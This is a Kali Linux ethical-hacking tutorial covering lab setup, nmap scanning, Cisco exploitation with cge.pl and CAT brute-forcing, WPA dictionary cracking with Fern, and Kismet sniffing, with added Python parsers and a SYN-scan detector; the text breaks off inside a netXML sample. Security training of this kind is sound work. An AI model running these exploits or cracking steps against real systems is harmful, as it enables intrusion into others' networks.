
1. Kali Linux ─ Installation & Configuration


Kali Linux

Kali Linux is one of the best security packages for an ethical hacker, containing a set of
tools divided by category. It is open source and its official webpage is
https://www.kali.org.

Generally, Kali Linux can be installed on a machine as the operating system or as a virtual
machine, which we will discuss in the following section. Installing Kali Linux is a practical
option as it provides more options to work with and to combine the tools. You can also create
a live boot CD or USB. All of this can be found at the following link:
https://www.kali.org/downloads/

BackTrack was the old version of the Kali Linux distribution. The latest release is Kali 2016.1
and it is updated very often.


To install Kali Linux ─

- First, we will download VirtualBox and install it.

- Later, we will download and install the Kali Linux distribution.

Download and Install VirtualBox


VirtualBox is particularly useful when you want to test something on Kali Linux that you
are unsure of. Running Kali Linux inside a VirtualBox virtual machine is safe when you want
to experiment with unknown packages or when you want to test some code.

With the help of VirtualBox, you can install Kali Linux on your system (not directly on
your hard disk) alongside your primary OS, which can be Mac, Windows or another flavor
of Linux.

Let’s understand how you can download and install VirtualBox on your system.


Step 1: To download, go to https://www.virtualbox.org/wiki/Downloads. Depending on
your operating system, select the right package. In this case, it will be the first one for
Windows as shown in the following screenshot.

[Screenshot: VirtualBox download page listing the VirtualBox 5.1.2 platform packages for Windows, OS X, Linux and Solaris hosts, plus the Extension Pack]

Step 2: Click Next.


2
Kali Linux

Step 3: The next page will give you options to choose the location where you want to
install the application. In this case, let us leave it as default and click Next.


Step 4: Click Next and the following Custom Setup screenshot pops up. Select the
features you want to be installed and click Next.



3
Kali Linux

Step 5: Click Yes to proceed with the installation.


Step 6: The Ready to Install screen pops up. Click Install.


4
Kali Linux

Step 7: Click the Finish button.


The VirtualBox application will now open as shown in the following screenshot. Now we
are ready to install the rest of the hosts used in this manual; this setup is also recommended
for professional usage.

[Screenshot: Oracle VM VirtualBox Manager window. The list of virtual machines on the left is empty because none has been created yet; a new virtual machine is created with the New button in the toolbar]


Install Kali Linux

Now that we have successfully installed VirtualBox, let’s move on to the next step and
install Kali Linux.

Step 1: Download the Kali Linux package from its official website:
https://www.kali.org/downloads/

[Screenshot: Offensive Security download page for prebuilt Kali Linux VMware and VirtualBox images, listing "Kali Linux 64 bit VM" and "Kali Linux 32 bit VM PAE" (version 2016.1, about 2.0 GB each) with torrent links and SHA1 sums]

Step 2: Click VirtualBox -> New as shown in the following screenshot.



Step 3: Choose the right virtual hard disk file and click Open.

[Screenshot: "Please choose a virtual hard disk file" dialog showing the Kali-Linux-2015.1-vm-amd64 folder with the .vmdk file and its split parts (-s001 to -s008)]

Step 4: The following screenshot pops up. Click the Create button.

[Screenshot: Create Virtual Machine dialog. Name: Kali 2016.1; Type: Linux; Version: Other Linux (64-bit); Hard disk: "Use an existing virtual hard disk file" pointing at Kali-Linux-2016.1-vm-amd64.vmdk (Normal, 30.00 GB); buttons Guided Mode, Create, Cancel]


Step 5: Start Kali OS. The default username is root and the password is toor.

Update Kali
It is important to keep Kali Linux and its tools updated to the latest versions so that they
remain functional. Following are the steps to update Kali.

Step 1: Go to Applications -> Terminal. Then, type “apt-get update” and the update will
take place as shown in the following screenshot.

[Screenshot: terminal window root@kali:~ running apt-get update]


Step 2: Now, to upgrade the tools, type “apt-get upgrade” and the new packages will be
downloaded.

root@kali:~# apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages were automatically installed and are no longer required:
  castxml gccxml gdebi-core libasn1-8-heimdal libgssapi3-heimdal
  libhcrypto4-heimdal libhdb9-heimdal libheimbase1-heimdal
  libheimntlm0-heimdal libhx509-5-heimdal libkdc2-heimdal libkrb5-26-heimdal
  libntdb1 libroken18-heimdal libwind0-heimdal python-ctypeslib python-ecdsa
  python-ntdb python-pyatspi python-tidylib vlc-plugin-notify vlc-plugin-samba
Use 'apt autoremove' to remove them.
The following packages have been kept back:
  adwaita-icon-theme apktool backdoor-factory bind9-host binwalk bluez
  bluez-obexd bundler cadaver couchdb cpp cpp-5 cutycapt default-jdk
  default-jre default-jre-headless dnsutils dradis driftnet erlang-asn1
  erlang-base erlang-crypto erlang-eunit erlang-inets erlang-mnesia
  erlang-os-mon erlang-public-key erlang-runtime-tools erlang-snmp erlang-ssl
  erlang-syntax-tools erlang-tools erlang-xmerl evolution-data-server
  evolution-data-server-common file folks-common ftp g++ g++-5 gcc gcc-5
  gcc-5-base gdm3 gedit gedit-common ghostscript gir1.2-gdkpixbuf-2.0
  gir1.2-gnomedesktop-3.0 gir1.2-gst-plugins-base-1.0 gir1.2-gstreamer-1.0
  ...

Step 3: It will ask if you want to continue. Type “Y” and “Enter”.



Step 4: To upgrade to a newer version of the operating system, type “apt-get dist-upgrade”.

Laboratory Setup
In this section, we will set up another testing machine to perform the tests with the help
of tools of Kali Linux.

Step 1: Download Metasploitable, which is a Linux machine. It can be downloaded from
the official webpage of Rapid7:
https://information.rapid7.com/metasploitable-download.html?LS=1631875&CS=web

[Screenshot: Rapid7 page "Metasploitable - Virtual Machine to Test Metasploit" with the registration form that must be filled in before downloading]


Step 2: Register by supplying your details. After filling in the above form, we can download
the software.

[Screenshot: Rapid7 page "Thank you for registering for Metasploitable" with the link "To download Metasploitable, click here!"]

Step 3: Click VirtualBox -> New.



Step 4: Click “Use an existing virtual hard disk file”. Browse to the file where you have
downloaded Metasploitable and click Open.


Step 5: A screen to create a virtual machine pops up. Click “Create”.

[Screenshot: Create Virtual Machine dialog. Name: Metasploitable; Memory size: 1024 MB; Hard disk: "Use an existing virtual hard disk file" pointing at Metasploitable.vmdk (Normal, 8.00 GB); buttons Guided Mode, Create, Cancel]


The default username is msfadmin and the password is msfadmin.

[Screenshot: "Metasploitable [Running] - Oracle VM VirtualBox" window showing the Metasploitable login prompt]

2. Kali Linux ─ Information Gathering Tools

In this chapter, we will discuss the information gathering tools of Kali Linux.

NMAP and ZenMAP

NMAP and ZenMAP are useful tools for the scanning phase of ethical hacking in Kali Linux.
NMAP and ZenMAP are practically the same tool; however, NMAP uses the command line while
ZenMAP has a GUI.

NMAP is a free utility tool for network discovery and security auditing. Many systems and
network administrators also find it useful for tasks such as network inventory, managing
service upgrade schedules, and monitoring host or service uptime.

NMAP uses raw IP packets in novel ways to determine which hosts are available on the
network, what services (application name and version) those hosts are offering, which
operating systems (and OS versions) they are running, what type of packet filters/firewalls
are in use, etc.

Now, let’s go step by step and learn how to use NMAP and ZenMAP.

Step 1: To open, go to Applications -> 01-Information Gathering -> nmap or zenmap.


Step 2: The next step is to detect the OS type/version of the target host. According to the
help shown by NMAP, the option for OS type/version detection is “-O”. For
more information, use this link: https://nmap.org/book/man-os-detection.html

The command that we will use is:

nmap -O 192.168.1.101

The following screenshot shows where you need to type the above command to see the
Nmap output:

[Screenshot: Zenmap with Target 192.168.1.101 and Command "nmap -O 192.168.1.101"; the Nmap Output tab shows:]

22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
6667/tcp open  irc
8009/tcp open  ajp13
8180/tcp open  unknown
MAC Address: 08:00:27:01:33:60 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

OS detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 17.55 seconds

Step 3: Next, scan for open TCP and UDP ports. To scan all the TCP ports with NMAP, use
the following command:

nmap -p 1-65535 -T4 192.168.1.101

Here the parameter “-p” indicates the TCP ports that have to be scanned; in this
case, we are scanning all the ports. “-T4” is the timing template, i.e. the speed at which
NMAP has to run.


Following are the results. In green are all the open TCP ports and in red are all the closed
ports. However, NMAP does not list the closed ports, as the list would be too long.

[Screenshot: Zenmap with Target 192.168.1.101 and Command "nmap -p 1-65535 -T4 192.168.1.101"; the Nmap Output tab shows:]

Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-16 18:04 Central European Daylight Time
Nmap scan report for 192.168.1.101
Host is up (0.000010s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  unknown
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  unknown
48285/tcp open  unknown
51161/tcp open  unknown
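The port tables printed by the -O scan above and by the full-range scan are in nmap's normal output format. The following added example (not part of the original tutorial and not nmap's own code) parses that format into a structured report and extracts what a defender would look at first: open ports nmap could not name, and ports that are newly open compared with an earlier scan. The sample text is constructed from the outputs above; the function and class names are the example's own.

```python
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Regexes for the lines of nmap's normal output that carry structured data.
HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
NOT_SHOWN_RE = re.compile(r"^Not shown: (\d+) (\w+) ports")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")
MAC_RE = re.compile(r"^MAC Address: ([0-9A-Fa-f:]{17})")
OS_RE = re.compile(r"^OS details: (.+)$")

@dataclass
class PortEntry:
    port: int
    proto: str
    state: str
    service: str

@dataclass
class ScanReport:
    host: Optional[str] = None
    mac: Optional[str] = None
    os_details: Optional[str] = None
    not_shown: int = 0            # ports nmap collapsed into "Not shown: N ... ports"
    not_shown_state: str = ""
    ports: List[PortEntry] = field(default_factory=list)

def parse_nmap_output(text: str) -> ScanReport:
    """Parse nmap's normal (human-readable) output for one host into a ScanReport."""
    report = ScanReport()
    for raw in text.splitlines():
        line = raw.strip()
        if m := HOST_RE.match(line):
            report.host = m.group(1)
        elif m := NOT_SHOWN_RE.match(line):
            report.not_shown, report.not_shown_state = int(m.group(1)), m.group(2)
        elif m := PORT_RE.match(line):
            report.ports.append(PortEntry(int(m.group(1)), m.group(2), m.group(3), m.group(4)))
        elif m := MAC_RE.match(line):
            report.mac = m.group(1)
        elif m := OS_RE.match(line):
            report.os_details = m.group(1).strip()
    return report

def open_ports(report: ScanReport) -> List[int]:
    return sorted(p.port for p in report.ports if p.state == "open")

def unidentified_ports(report: ScanReport) -> List[int]:
    """Open ports nmap could not name from its services table; on a host you
    defend these are the first to identify, since no known daemon claims them."""
    return sorted(p.port for p in report.ports if p.state == "open" and p.service == "unknown")

def new_open_ports(baseline: ScanReport, current: ScanReport) -> List[int]:
    """Ports open now that were not open in an earlier scan of the same host."""
    return sorted(set(open_ports(current)) - set(open_ports(baseline)))

# Constructed sample: the port table of the full-range scan above plus the
# OS-detection lines of the -O scan, re-typed as nmap prints them.
SAMPLE_OUTPUT = """\
Nmap scan report for 192.168.1.101
Host is up (0.000010s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE
21/tcp    open  ftp
22/tcp    open  ssh
23/tcp    open  telnet
25/tcp    open  smtp
53/tcp    open  domain
80/tcp    open  http
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
512/tcp   open  exec
513/tcp   open  login
514/tcp   open  shell
1099/tcp  open  rmiregistry
1524/tcp  open  ingreslock
2049/tcp  open  nfs
2121/tcp  open  ccproxy-ftp
3306/tcp  open  mysql
3632/tcp  open  distccd
5432/tcp  open  postgresql
5900/tcp  open  vnc
6000/tcp  open  X11
6667/tcp  open  irc
6697/tcp  open  unknown
8009/tcp  open  ajp13
8180/tcp  open  unknown
8787/tcp  open  unknown
48285/tcp open  unknown
51161/tcp open  unknown
MAC Address: 08:00:27:01:33:60 (Oracle VirtualBox virtual NIC)
OS details: Linux 2.6.9 - 2.6.33
Nmap done: 1 IP address (1 host up) scanned in 17.55 seconds
"""
```

Feeding two scans of the same host to new_open_ports is a simple way to turn the tutorial's manual port review into a repeatable exposure check.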

Stealth Scan
A stealth scan, or SYN scan, is also known as a half-open scan, as it doesn’t complete the TCP
three-way handshake. A hacker sends a SYN packet to the target; if a SYN/ACK frame is
received back, then it’s assumed the target would complete the connection and the port is
listening. If an RST is received back from the target, then it is assumed the port isn’t active
or is closed.

HOST 1  --- SYN + port number --->  HOST 2
HOST 1  <-------- RST ------------  HOST 2      (port is closed)

HOST 1  --- SYN + port number --->  HOST 2
HOST 1  <------ SYN/ACK ----------  HOST 2
HOST 1  --------- RST ----------->  HOST 2      (port is open)

Now, to see the SYN scan in practice, use the parameter “-sS” in NMAP. Following is the full
command:

nmap -sS -T4 192.168.1.101

The following screenshot shows how to use this command:

[Screenshot: Zenmap with Target 192.168.1.101 and Command "nmap -sS -p 1-6500 192.168.1.101"; the Nmap Output tab shows:]

Starting Nmap 7.12 ( https://nmap.org ) at 2016-09-16 22:34 Central European Daylight Time
Nmap scan report for 192.168.1.101
Host is up.
Not shown: 6479 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
53/tcp   open  domain
80/tcp   open  http
111/tcp  open  rpcbind
139/tcp  open  netbios-ssn
445/tcp  open  microsoft-ds
512/tcp  open  exec
513/tcp  open  login
514/tcp  open  shell
1099/tcp open  rmiregistry
1524/tcp open  ingreslock
2049/tcp open  nfs
2121/tcp open  ccproxy-ftp
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
5900/tcp open  vnc
6000/tcp open  X11
MAC Address: 08:00:27:01:33:60 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 16.38 seconds
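The half-open exchange described in the Stealth Scan section has a signature that the scanned side can see: many SYNs from one client that end either in an RST from the target (closed port) or in a client RST right after the SYN/ACK (open port), and almost no completed handshakes. The following added example (not part of the original tutorial, and not nmap's code) walks a constructed packet list with that logic and flags the scanning client. The Packet class, the simplified flag strings and the sample addresses are the example's own assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Packet:
    src: str
    dst: str
    sport: int
    dport: int
    flags: str   # simplified TCP flag letters, e.g. "S", "SA", "A", "R", "RA"


Flow = Tuple[str, str, int]   # (client, server, server_port)


def classify_flows(packets: List[Packet]) -> Dict[Flow, str]:
    """Walk packets in capture order and record how each client->server:port attempt ended.

    Outcomes: 'syn_sent' (no reply seen), 'closed' (server answered the SYN with RST),
    'half_open' (client sent RST after the SYN/ACK instead of the final ACK, i.e. the
    stealth-scan signature from the section above), 'completed' (client sent the ACK).
    """
    state: Dict[Flow, str] = {}
    for p in packets:
        as_client: Flow = (p.src, p.dst, p.dport)   # if this packet goes client -> server
        as_server: Flow = (p.dst, p.src, p.sport)   # if this packet goes server -> client
        if p.flags == "S":
            state.setdefault(as_client, "syn_sent")
        elif p.flags == "SA" and state.get(as_server) == "syn_sent":
            state[as_server] = "synack_received"
        elif p.flags in ("R", "RA"):
            if state.get(as_server) == "syn_sent":            # server refused the SYN
                state[as_server] = "closed"
            elif state.get(as_client) == "synack_received":   # client aborted the handshake
                state[as_client] = "half_open"
        elif p.flags == "A" and state.get(as_client) == "synack_received":
            state[as_client] = "completed"
    return state


def detect_syn_scanners(packets: List[Packet], min_ports: int = 5) -> Dict[str, int]:
    """Return {client_ip: probed_port_count} for clients that look like SYN scanners:
    at least min_ports distinct (server, port) pairs ending half-open or closed,
    and more of those than completed connections."""
    per_client = defaultdict(lambda: {"probed": set(), "completed": set()})
    for (client, server, port), outcome in classify_flows(packets).items():
        if outcome in ("half_open", "closed"):
            per_client[client]["probed"].add((server, port))
        elif outcome == "completed":
            per_client[client]["completed"].add((server, port))
    return {
        client: len(b["probed"])
        for client, b in per_client.items()
        if len(b["probed"]) >= min_ports and len(b["probed"]) > len(b["completed"])
    }


# Constructed capture (assumed addresses): 192.168.1.100 half-open-scans the lab host
# 192.168.1.101 on ports the nmap outputs above list as open, plus two closed ports;
# 192.168.1.50 is an ordinary client completing one HTTP handshake.
SCANNER, TARGET, CLIENT = "192.168.1.100", "192.168.1.101", "192.168.1.50"


def _probe(sport: int, dport: int, port_open: bool) -> List[Packet]:
    pkts = [Packet(SCANNER, TARGET, sport, dport, "S")]
    if port_open:
        pkts.append(Packet(TARGET, SCANNER, dport, sport, "SA"))
        pkts.append(Packet(SCANNER, TARGET, sport, dport, "R"))   # no final ACK: half-open
    else:
        pkts.append(Packet(TARGET, SCANNER, dport, sport, "RA"))  # closed port
    return pkts


SAMPLE_CAPTURE: List[Packet] = []
for i, port in enumerate([21, 22, 23, 25, 80, 3306]):
    SAMPLE_CAPTURE += _probe(40000 + i, port, port_open=True)
for i, port in enumerate([8000, 8001]):
    SAMPLE_CAPTURE += _probe(41000 + i, port, port_open=False)
SAMPLE_CAPTURE += [
    Packet(CLIENT, TARGET, 50000, 80, "S"),
    Packet(TARGET, CLIENT, 80, 50000, "SA"),
    Packet(CLIENT, TARGET, 50000, 80, "A"),
]

if __name__ == "__main__":
    print(detect_syn_scanners(SAMPLE_CAPTURE))   # {'192.168.1.100': 8}
```

A host-based firewall log or a packet capture reduced to (src, dst, sport, dport, flags) tuples can be fed to detect_syn_scanners unchanged; the threshold min_ports is where you tune for your own noise level.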


Searchsploit
Searchsploit is a tool that helps Kali Linux users search the Exploit Database archive
directly from the command line.

To open it, go to Applications -> 08-Exploitation Tools -> searchsploit, as shown in the
following screenshot.

After opening the terminal, type "searchsploit exploit index name".

[Screenshot: terminal output of "searchsploit windows", listing the matching Exploit Database entries in two columns, Exploit Title and Path (relative to /usr/share/exploitdb/platforms)]


DNS Tools
In this section, we will learn how to use some DNS tools that Kali has incorporated.
Basically, these tools help with zone transfers or with domain/IP resolution issues.

dnsenum.pl
The first tool is dnsenum.pl, which is a Perl script that helps to get the MX, A, and other
records connected to a domain.

Click the terminal on the left panel.

Type “dnsenum domain name” and all the records will be shown. In this case, it shows the
A records.


DNSMAP
The second tool is DNSMAP, which helps to find the phone numbers, contacts, and other
subdomains connected to the domain that we are searching. Following is an example.

Click the terminal as in the upper section, then write “dnsmap domain name”.

dnstracer
The third tool is dnstracer, which determines where a given Domain Name Server (DNS)
gets its information from for a given hostname.

Click the terminal as in the upper section, then type “dnstracer domain name”.

root@kali:~# dnstracer <domain>.com
Tracing to <domain>.com[a] via 127.0.0.1, maximum of 3 retries
127.0.0.1 (127.0.0.1) ...


LBD Tools
LBD (Load Balancing Detector) is a very interesting tool, as it detects whether a given domain
uses DNS and/or HTTP load balancing. It is important because if you have two servers,
one or the other may not be updated and you can try to exploit it. Following are the steps
to use it:

First, click the terminal on the left panel.

Then, type “lbd domainname”. If it produces the result “FOUND”, it means that the
server uses a load balancer. In this case, the result is “NOT FOUND”.

Hping3
Hping3 is widely used by ethical hackers. It is quite similar to ping tools but is more
advanced, as it can bypass firewall filters and use the TCP, UDP, ICMP and RAW-IP
protocols. It has a traceroute mode and the ability to send files over a covert channel.

Click the terminal on the left panel.


Type “hping3 -h”, which will show how to use this command.

root@kali:~# hping3 -h
usage: hping3 host [options]
  -h  --help      show this help
  -v  --version   show version
  -c  --count     packet count
  -i  --interval  wait (uX for X microseconds, for example -i u1000)
      --fast      alias for -i u10000 (10 packets for second)
      --faster    alias for -i u1000 (100 packets for second)
      --flood     sent packets as fast as possible. Don't show replies.
  -n  --numeric   numeric output
  -q  --quiet     quiet
  -I  --interface interface name (otherwise default routing interface)
  -V  --verbose   verbose mode
  -D  --debug     debugging info
  -z  --bind      bind ctrl+z to ttl           (default to dst port)
  -Z  --unbind    unbind ctrl+z
      --beep      beep for every matching packet received
Mode
  default mode     TCP
  -0  --rawip      RAW IP mode
  -1  --icmp       ICMP mode
  -2  --udp        UDP mode

The other command is “hping3 domain or IP -parameter”:

root@kali:~# hping3 192.168.1.102 -v
using eth0, addr: 192.168.1.101, MTU: 1500
HPING 192.168.1.102 (eth0 192.168.1.102): NO FLAGS are set, 40 headers + 0 data bytes
len=46 ip=192.168.1.102 ttl=64 DF id=0 tos=0 iplen=40
sport=0 flags=RA seq=0 win=0 rtt=10.6 ms
seq=0 ack=982034245 sum=c40 urp=0

len=46 ip=192.168.1.102 ttl=64 DF id=0 tos=0 iplen=40
sport=0 flags=RA seq=1 win=0 rtt=0.4 ms
seq=0 ack=1964174310 sum=dfc0 urp=0

3. Kali Linux ─ Vulnerability Analysis Tools

In this chapter, we will learn how to use some of the tools that help us exploit devices or
applications in order to gain access.

Cisco Tools
Kali has some tools that can be used to exploit Cisco routers. One such tool is Cisco-torch,
which is used for mass scanning, fingerprinting, and exploitation.

Let’s open the Terminal console by clicking the left pane.

Then, type “cisco-torch -parameter IP of host”. If nothing is found to exploit,
the following result will be shown.

root@kali:~# cisco-torch -n 10.22.21.1
Using config file torch.conf...
Loading include and plugin...

###############################################################
#   Cisco Torch Mass Scanner                                  #
#   Becase we need it...                                      #
#   http://www.arhont.com/cisco-torch.pl                      #
###############################################################

List of targets contains 1 host(s)
1735:   Checking 10.22.21.1 ...
--->
- All scans done. Cisco Torch Mass Scanner -
--->


To see what parameters can be used, type “cisco-torch ?”

root@kali:~# cisco-torch ?
Using config file torch.conf...
Loading include and plugin...
version
usage: cisco-torch <options> <IP,hostname,network>
or:    cisco-torch <options> -F <hostlist>

Available options:
-O <output file>
-A    All fingerprint scan types combined
-t    Cisco Telnetd scan
-s    Cisco SSHd scan
-u    Cisco SNMP scan
-g    Cisco config or tftp file download
-n    NTP fingerprinting scan
-j    TFTP fingerprinting scan
-l <type> loglevel
      c critical (default)
      v verbose
      d debug
-w    Cisco Webserver scan

Cisco Auditing Tool

It is a Perl script which scans Cisco routers for common vulnerabilities. To use it, again
open the terminal on the left pane as shown in the previous section and type “CAT -h
hostname or IP”.

You can add the port parameter “-p” as shown in the following screenshot, which in this
case is 23, to brute-force it.


Cisco Global Exploiter

Cisco Global Exploiter (CGE) is an advanced, simple, and fast security testing tool. With
this tool, you can perform several types of attacks as shown in the following screenshot.

However, be careful while testing in a live environment, as some of them can crash the
Cisco device. For example, some of the options stop the device’s services.

root@kali:~# cge.pl

Usage :
perl cge.pl <target> <vulnerability number>

Vulnerabilities list :
[1] - Cisco 677/678 Telnet Buffer Overflow Vulnerability
[2] - Cisco IOS Router Denial of Service Vulnerability
[3] - Cisco IOS HTTP Auth Vulnerability
[4] - Cisco IOS HTTP Configuration Arbitrary Administrative Access Vulnerability
[5] - Cisco Catalyst SSH Protocol Mismatch Denial of Service Vulnerability
[6] - Cisco 675 Web Administration Denial of Service Vulnerability
[7] - Cisco Catalyst 3500 XL Remote Arbitrary Command Vulnerability
[8] - Cisco IOS Software HTTP Request Denial of Service Vulnerability
[9] - Cisco 514 UDP Flood Denial of Service Vulnerability
[10] - CiscoSecure ACS for Windows NT Server Denial of Service Vulnerability
[11] - Cisco Catalyst Memory Leak Vulnerability
[12] - Cisco CatOS CiscoView HTTP Server Buffer Overflow Vulnerability
[13] - 0 Encoding IDS Bypass Vulnerability (UTF)
[14] - Cisco IOS HTTP Denial of Service Vulnerability

To use this tool, type “cge.pl IPaddress number of vulnerability”.

The following screenshot shows the result of the test performed on a Cisco router for
vulnerability number 3 from the list above. The result shows the vulnerability was
successfully exploited.

root@kali:~# cge.pl 10.22.21.1 3

Vulnerability successful exploited with [http://10.22.21.1/level/17/exec/....] .


BED
BED is a program designed to check daemons for potential buffer overflows, format strings,
et al.

root@kali:~# bed

BED 0.5 by mjm ( www.codito.de ) & eric ( www.snake-basket.de )

Usage:

./bed.pl -s <plugin> -t <target> -p <port> -o <timeout> [ depends on the plugin ]

<plugin>   FTP/SMTP/POP/HTTP/IRC/IMAP/PJL/LPD/FINGER/SOCKS4/SOCKS5
<target>   Host to check (default: localhost)
<port>     Port to connect to (default: standard port)
<timeout>  seconds to wait after each test (default: 2 seconds)

use "./bed.pl -s <plugin>" to obtain the parameters you need for the plugin.

Only -s is a mandatory switch.

In this case, we will test the test machine with IP 192.168.1.102 and the HTTP
protocol.

The command will be “bed -s HTTP -t 192.168.1.102” and the testing will run:

root@kali:~# bed -s HTTP -t 192.168.1.102

BED 0.5 by mjm ( www.codito.de ) & eric ( www.snake-basket.de )

+ Buffer overflow testing:
    testing: 1  HEAD XAXAX HTTP/1.0 .
    testing: 2  HEAD / XAXAX .
    testing: 3  GET XAXAX HTTP/1.0 .
    testing: 4  GET / XAXAX .
    testing: 5  POST XAXAX HTTP/1.0 .
    testing: 6  POST / XAXAX .
    testing: 7  GET /XAXAX .
    testing: 8  POST /XAXAX .
+ Formatstring testing:
    testing: 1  HEAD XAXAX HTTP/1.0 .
    testing: 2  HEAD / XAXAX .
    testing: 3  GET XAXAX HTTP/1.0 .
    testing: 4  GET / XAXAX .
    testing: 5  POST XAXAX HTTP/1.0 .
    testing: 6  POST / XAXAX .
    testing: 7  GET /XAXAX .
    testing: 8  POST /XAXAX .
. Normal tests
+ Buffer overflow testing:
    testing: 1  User-Agent: XAXAX .
    testing: 2  Host: XAXAX .
    testing: 3  Accept: XAXAX .
    testing: 4  Accept-Encoding: XAXAX .
    testing: 5  Accept-Language: XAXAX .
    testing: 6  Accept-Charset: XAXAX .
    testing: 7  Connection: XAXAX .

4. Kali Linux ─ Wireless Attacks

In this chapter, we will learn how to use the Wi-Fi cracking tools that Kali Linux has
incorporated. However, it is important that the wireless card you have supports
monitor mode.

Fern Wifi Cracker

Fern Wifi Cracker is one of the tools that Kali has to crack wireless networks.

Before opening Fern, we should put the wireless card into monitor mode. To do this,
type “airmon-ng start wlan0” in the terminal.

[Screenshot: terminal window root@kali:~ running airmon-ng]

Now, open Fern Wireless Cracker.

Step 1: Applications -> Click “Wireless Attacks” -> “Fern Wireless Cracker”.


Step 2: Select the wireless card as shown in the following screenshot.

[Screenshot: Fern WIFI Cracker main window with the interface selector (wlan0, "Monitor Mode Enabled"), the "Scan for Access Points" button, the WEP and WPA result buttons, and the key database showing "No Key Entries"]


Step 3: Click “Scan for Access Points”.

[Screenshot: Fern WIFI Cracker 1.9 scanning for access points]


Step 4: After finishing the scan, it will show all the wireless networks found. In this case,
only “WPA networks” were found.

[Screenshot: Fern WIFI Cracker 1.9 showing the networks found]

Step 5: Click WPA networks as shown in the above screenshot. It shows all the wireless
networks found. Generally, for WPA networks, it performs dictionary attacks.

Step 6: Click “Browse” and find the wordlist to use for the attack.


Step 7: Click “Wifi Attack”.

Step 8: After finishing the dictionary attack, it finds the password and shows it as
depicted in the following screenshot.


Kismet
Kismet is a WIFI network analyzing tool. It is a 802.11 layer-2 wireless network detector,
sniffer, and intrusion detection system. It will work with any wireless card that supports
raw monitoring (rfmon) mode, and can sniff 802.11a/b/g/n traffic. It identifies the
networks by collecting packets and also hidden networks.

To use it, first put the wireless card into monitoring mode by typing “airmon-ng
start wlan0” in the terminal.

Let’s learn how to use this tool.

Step 1: To launch it, open terminal and type “kismet”.


Step 2: Click “OK”.

Step 3: Click “Yes” when it asks to start Kismet Server. Otherwise it will stop functioning.

Step 4: Startup Options, leave as default. Click “Start”.


Step 5: A dialog now asks you to define the wireless card (packet source). In this case, click
“Yes”.

root@kali:~

ERROR: Could not open OUI file '/etc/manuf': No such file or directory
ERROR: Could not open OUI file '/usr/share/wireshark/wireshark.manuf': No such file or directory
INFO: Opened OUI file '/usr/share/wireshark/manuf'
INFO: Indexing manufacturer db
INFO: Completed indexing manufacturer db. 27350 lines 547 indexes
INFO: Creating network tracker...
INFO: Kismet starting to gather packets
INFO: No packet sources defined. You MUST ADD SOME using the Kismet client, or by placing them in the Kismet config file (/etc/kismet/kismet.conf)
INFO: Kismet server accepted connection from 127.0.0.1

Step 6: In this case, the wireless source is “wlan0”. It will have to be written in the
section “Intf” -> click “Add”.


Step 7: It will start sniffing the wifi networks as shown in the following screenshot.

Step 8: Click on any network, it produces the wireless details as shown in the following
screenshot.


GISKismet
GISKismet is a wireless visualization tool to represent data gathered using Kismet in a
practical way. GISKismet stores the information in a database so we can query data and
generate graphs using SQL. GISKismet currently uses SQLite for the database and
GoogleEarth / KML files for graphing.

Let’s learn how to use this tool.

Step 1: To open GISKismet, go to: Applications -> Click “Wireless Attacks” -> giskismet.

As you remember from the previous section, we used the Kismet tool to collect data about
wireless networks; Kismet stores all this data in netXML files.


Step 2: To import such a file into GISKismet, type “giskismet -x Kismet-filename.netxml”
and it will start importing the file.

Once imported, we can load the hotspots we found earlier into Google Earth.


Step 3: Assuming that Google Earth is already installed, click File -> Open, select the file
that GISKismet created, and click “Open”.


The following map will be displayed.
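The same pipeline in Python, as an added example that is not GISKismet's own code: parse a netXML survey, load it into SQLite, query it with SQL, and emit KML for Google Earth. The netxml layout is assumed from Kismet-newcore output, and the sample file below is constructed.

```python
import sqlite3
import xml.etree.ElementTree as ET

# Constructed sample in the Kismet-newcore netxml layout (assumed); not a real capture.
SAMPLE_NETXML = """<?xml version="1.0" encoding="ISO-8859-1"?>
<detection-run kismet-version="2016.01.R1" start-time="Sat Oct 22 19:00:00 2016">
  <wireless-network number="1" type="infrastructure">
    <SSID>
      <type>Beacon</type>
      <encryption>WPA+PSK</encryption>
      <encryption>WPA+AES-CCM</encryption>
      <essid cloaked="false">HomeNet</essid>
    </SSID>
    <BSSID>00:11:22:33:44:55</BSSID>
    <channel>6</channel>
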